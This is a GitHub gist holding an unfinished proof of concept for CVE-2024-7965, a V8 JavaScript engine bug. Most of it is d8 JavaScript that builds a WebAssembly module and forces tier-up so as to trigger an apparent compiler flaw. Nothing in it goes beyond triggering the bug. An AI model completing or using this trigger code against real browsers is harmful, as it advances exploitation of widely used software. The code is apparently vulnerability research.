Last active
October 18, 2024 08:56
-
-
Save buptsb/dba56386a8508dae3263c9f275b94e03 to your computer and use it in GitHub Desktop.
CVE-2024-7965 unfinished poc
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // ./d8 --allow-natives-syntax --trace-turbo --trace_turbo_graph --trace_deopt --trace_compilation_dependencies --trace_wasm_compiler --code-comments --compile_hints_magic --trace-wasm-decoder --soft-abort --expose-gc ~/cves/CVE-2024-7965/1.js | |
| const prefix = "..."; | |
| d8.file.execute(`${prefix}/test/mjsunit/wasm/wasm-module-builder.js`); | |
| const builder = new WasmModuleBuilder(); | |
| const $g0 = builder.addGlobal(kWasmI32, true, false); | |
| const $g1 = builder.addGlobal(kWasmI32, true, false); | |
| const $g2 = builder.addGlobal(kWasmI64, true, false); | |
| const $g3 = builder.addGlobal(kWasmI64, true, false); | |
| const $typ1 = builder.addType(makeSig([kWasmI32], [kWasmI32])); | |
| const $jsFunc = builder.addImport('m', 'jsfunc1', kSig_i_v); | |
| const $jsFunc2 = builder.addImport('m', 'jsfunc2', kSig_v_i); | |
| let tag = builder.addTag(kSig_v_i); | |
| const $f2 = builder.addFunction('f2', kSig_i_i).exportFunc().addBody([ | |
| kExprLocalGet, 0, | |
| ...wasmI32Const(0x1), | |
| kExprI32Add, | |
| ]); | |
| function jsfunc1(a1) { | |
| return 0x42; | |
| } | |
| function jsfunc2(flag) { | |
| if (flag) { | |
| // %SystemBreak(); | |
| } | |
| } | |
| builder.addFunction('test', makeSig([kWasmI32, kWasmI32, kWasmI32, kWasmI32], [])).addBody([ | |
| ...wasmI32Const(0x40), | |
| kExprLoop, $typ1, | |
| kExprLocalGet, 1, | |
| kExprIf, $typ1, | |
| kExprNop, | |
| kExprElse, | |
| kExprI64UConvertI32, | |
| kExprGlobalSet, $g3.index, | |
| kExprGlobalGet, $g1.index, | |
| ...wasmI32Const(0x1), | |
| kExprI32Add, | |
| kExprGlobalSet, $g1.index, | |
| ...wasmI32Const(0x42), | |
| kExprEnd, | |
| kExprLocalGet, 0, | |
| kExprIf, $typ1, | |
| kExprNop, | |
| kExprElse, | |
| // the path which returns false in DFS recursion because of call | |
| // kExprCallFunction, $f2.index, | |
| kExprDrop, | |
| kExprCallFunction, $jsFunc, | |
| kExprEnd, | |
| kExprLoop, $typ1, | |
| kExprLocalGet, 0, | |
| kExprIf, $typ1, | |
| // start DFS recursion from here | |
| kExprI64UConvertI32, | |
| kExprGlobalSet, $g2.index, | |
| ...wasmI32Const(0x11), | |
| kExprElse, | |
| kExprNop, | |
| kExprEnd, | |
| kExprLocalGet, 0, | |
| kExprBrIf, 0, | |
| kExprEnd, | |
| kExprGlobalGet, $g1.index, | |
| ...wasmI32Const(1), | |
| kExprI32Eq, | |
| kExprBrIf, 0, | |
| kExprEnd, | |
| kExprLocalGet, 3, | |
| kExprCallFunction, $jsFunc2, | |
| kExprDrop, | |
| ]).exportFunc(); | |
| const instance = builder.instantiate({m: {jsfunc1, jsfunc2}}); | |
| instance.exports.test(0, 1, 0, 0); | |
| %WasmTierUpFunction(instance.exports.test); | |
| instance.exports.test(0, 1, 0x41, 1); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment